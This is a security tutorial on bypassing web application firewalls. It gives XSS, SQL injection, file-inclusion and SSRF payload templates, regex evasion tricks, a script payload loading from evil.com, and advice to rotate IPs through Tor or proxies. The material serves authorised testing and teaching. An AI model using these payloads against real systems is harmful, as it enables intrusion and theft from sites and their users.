A web application firewall (WAF) is a program specially designed to filter, monitor and block malicious web requests related to its configurations.
The WAF filter and detection department is dependent on two primary configurations. The black/white list and a regex. These configurations make it possible for a WAF to determine if a request contains malicious content.
In this article, we will discuss different ways a WAF can be bypassed when a vulnerability has been discovered.
The topic will focus on how to take advantage of the configurations and normalisation that could affect the way a payload is being handled in the transport. We will show different scenarios and examples of manipulations that lead to a successful bypass.
/ Regex and list tampering
Regex stands for regular expression and is a method or sequence of characters to detect patterns inside its given content. In simple words, regex can be used to detect patterns from a source and makes a huge advantage when developing filter mechanisms for web application firewalls.
An example of how a regex could be used to find all words starting with the uppercase “Y“.
Yes It's possible to hack on YesWeHack. You just need to sign up!
If you want to dig deeper and practice custom regex, you can do so here.
Did you notice anything?
The last payload looks almost identical to the first but it’s not detected by the regex. Why?
This is because the regex is not configured to detect patterns unless it ends with a
> in this case. Imagine how precise the regex has to be to be able to detect a pattern.
This is one of the many examples how web application firewalls are being bypassed.
So, what happens if we just remove the
> at the end of the regex and keep the anything
Also known as:
This is bypassable because we take advantage of two techniques. First, the regex looks for a payload that starts with
< and secondly it looks for any onload statement followed by an equal sign
The last payload in the image takes advantage of the
< symbol that the regex is searching for as a prefix. The payload splits into two pieces with the help of a newline
The first payload piece starts with the
< symbol and triggers the regex to start its pattern search. Then, when we add the newline to the payload, the regex is broken. The regex breaks because the
.* checks for anything except newlines. This makes the payload undetectable.
Lastly, we add our final piece to the payload that includes the
onerror=alert(1) part. The regex won’t detect the onerror statement since it’s not starting with the
< symbol, which is needed to trigger the regex. It results in a successful bypass.
A WAF also uses different word lists to detect payloads by searching for words inside the request. If it detects a word within the given blacklist in the request, the request will be blocked by the WAF. The opposite type of list is the whitelist. This word list contains words which are allowed to be used or that are strictly needed within an input.
Let’s upgrade the regex filter and add all previous bypass methods to fix bypasses related to newlines.
.*|\n simply means (anything or newlines)
alert confirm prompt iframe script style base
The regex didn’t detect
<img src=1 but detected the
onerror=alert(1) part at the second last payload. This results in a WAF block but in a real world scenario you would have gotten a forbidden/block page without being aware of the fact that half of your payload was successful.
That’s a reason why it’s very important to take one step at a time when crafting a payload (more on that later).
So how did the latest payload bypass the regex?
This is because we have configured the regex to detect anything OR newlines
on(.*|\n)= and not both of them combined.
I think you get the point. It is very difficult to configure a firewall to detect all kinds of patterns. Because the payload is so extremely flexible, the payload is always one step ahead.
/ Firewall and frontend/backend filter
It’s important not to mix up firewall filters with frontend and backend filters. You might be able to bypass the firewall but that doesn’t mean you actually found a vulnerability within the system itself. Remember that the firewalls purpose is to have an extra protection and detection for malicious requests.
If the frontend and/or backend do not filter/escape properly, this would likely instead be a vulnerability. This isn’t the case if it’s within the web application firewall filters since the firewall do not protect an actual input handler.
A good example would be the following:
<img src='1' onerror='alert(1)'>
Scenario 1. Payload blocked:
Scenario 2. Payload bypassed:
WAF transfer the request to the backend code
<p>no result for: <b><img src='1' onerror='alert(1)'></b></p>
Web application firewall bypass and vulnerability exploited. Resulting in
Cross-Site scripting (XSS).
In this case, the firewall was bypassed and the backend was vulnerable to an XSS injection because it didn’t escape the actual user input handling for dangerous chars.
If the backend were to escape the search GET parameter ($input variable), the result would be that the WAF was bypassed but the input itself was not vulnerable to XSS.
Backend programming language PHP – htmlspecialchars()
<p>No result for: <b><img src='1' onerror='alert(1)'></b></p>
Web application firewall bypassed but search parameter wasn't vulnerable.
When trying to bypass a WAF, it is very important to first determine how the frontend/backend filter works before attempting to exploit it. If the entrance is not vulnerable, what is the point of bypassing the firewall?
/ Normalisation and filter collision
In many cases, frontend, backend and/or technologies such as proxies cause not only normalisation but also filter collisions. A filter collision occurs when there are two or more filters that have a similar task in common.
Example of a simple collision
Image that we use a payload as following:
- The browser will URL encode the char
"and then transfer it to the web application firewall.
Payload → ywh%22
- The WAF sees no suspected content and the payload continues to the frontend.
Payload → ywh\"
5. The backend deletes all quotes in the input to avoid quotes altogether. (Collides with frontend filter)
Payload → ywh\
6. When the payload reflects in the frontend response, it will appear as
The end results. You are now able to take advantage of this collision for a lot of different payloads. Since the quotes are deleted and leave the
\ alone, you could use them to bypass URL verification or escape backslash itself with
\\" that will result in
Take advantage of all the different behaviours of the target when bypassing the web application firewall.
Example custom payloads related to the collision
SSRF → http:""localhost XSS (that includes links etc) → src='""://evil.com/xss.js'
/ Payload preparation
The main challenge when trying to adapt a bypassable payload is to determine how the payload is understood by the web application firewall. Since a WAF only responds with a forbidden page or lets the payload pass, we need to take small steps forward to build up a payload.
The payload should contain only the characters that are necessary for the type of vulnerability you are trying to exploit. This will provide a better understanding of how the payload is managed and changes during the process.
There are lots of different ways to customise a payload. Besides, depending on the vulnerability, there are different characters that are particularly important to include for a successful payload.
Example: (Not limited to)
- SQL injections:
- Cross-site Scripting:
- Template Injection:
- PHP code injection:
- Local file include:
There is no need to use
onload if the firewall does not protect against the HTML tag
<script> and there is no need to use the symbols
> if we infect within an HTML tag.
The same goes for SQL injection, Template injection or other types of vulnerabilities that need a payload to be exploited properly. Create and adapt a payload from the location where it is placed.
There are some good payloads out there, but if you want to be able to bypass WAFs at an advanced level, most of these payloads are not the solution. However, taking notes from them and storing template payloads are good strategies.
Consider a simple payload as follows:
The payload itself do not exploit anything. The first step is actually getting blocked. It may sound strange, but it’s the first step in creating a payload that can bypass the WAF. The only situation where this technique can be bad is if the firewall blocks you permanently. In these cases, you can use proxies that allow you to change IP addresses frequently. Tor can be useful in these situations.
Most WAFs block this payload directly because it contains the HTML tag
<script>, which is often used in XSS payloads. If this would have been a SQL injection, the payload:
' or 1=1 -- - would have been a good choice to use since it is obvious that it will be blocked.
So why do we want a blocked payload?
It’s because it’s not possible to adapt a payload to bypass a WAF without the knowledge on how the WAF sees the input. The fact that common payloads are a good core is because they provide an opportunity to get a direct feedback from the firewall. This will be used to easier do a reconnaissance of the firewall configurations. Most of the time, the firewall will be even stricter because we trigger more filter departments.
Payload: <script> <, > -> are probably within the regex pattern script -> Is probably inside the blacklist
To continue the process, we will now start adjusting the payload until we have got the information we need. For each time the payload gets blocked/valid, you get more feedback on how you can adjust your payload to bypass the WAF.
If the firewall only blocks the request but not the host it came from, it’s possible to automate some parts.
Example of some automated process could be:
Example of a WAF reconnaissance process
Using the steps in the
<script> payload, we now have an understanding of how WAF filters its input data. We successfully managed to collect working tampers that we can work with to build a fully functional payload that will bypass the firewall.
/ Payload templates
These are core templates and there are lots of different types that you can use and create yourself. Always use the characters and combinations that give the best feedback from the web application firewall.
<script> <svg> <iframe> <base> <img onx=1 //Can later be tested with: '0"><x <1337onx=1> </x> "<x>" <x"0'x
' or 1=1 -- x \'or+1='' ' x 1=1 sleep(4) '||1 ' select x //Can later be tested with: or/**/and/**/ ' x=1 x')or('x
Local file inclusion
/etc/passwd etcpasswd ..;/..;/ x../../x ../ //Can later be tested with: ../.. 1337../ ../..x.png ./././ .:./.:./ .%00./x.php
The methodology covers the different paths from when a vulnerability is detected but blocked by the web application firewall, which prevents the payload from successfully exploiting the vulnerability.
Analyse the types of chars that can be used in the payload.
Detect if there is any normalisation accure related to the technology used by the target that may affect the transport of the payload and/or its content to be modified.
Determine how the frontend and/or backend filters adjust the payload and then use that against the web application firewall (Delete, Replace, Append, Add chars etc…).
Look for collisions between frontend and backend filters (if any). This is rare, but in some vulnerabilities it is possible to take advantage of the vulnerable input behavior to bypass the web application firewall as well.
For each time, add a new piece to your payload to detect the firewall regex.
Black and white lists
Once the basic knowledge of the WAF regex is known, add possible strings to the white/black list of the payload to analyse in which areas it can and cannot be used.
Analyse the results of the different payloads used. Use this technique to adjust and update the next payload that will be used.
/ Firewall weaknesses
This is based on successful techniques that have repeatedly managed to bypass the same firewall for web applications in different companies.
- Newlines that split the payload
- Overload of parentheses
- Payloads do) not include spaces
- Weak blacklist
- Base64 encode
- Newlines that split the payload
- Math to set or compare values
- Multi-line comment with backslashes manipulation
- Double URL encoding
- Base64 encode
- Early discovered
- Space before parentheses/backtricks
- Payloads do not include spaces
When payloads are presented inside quotes.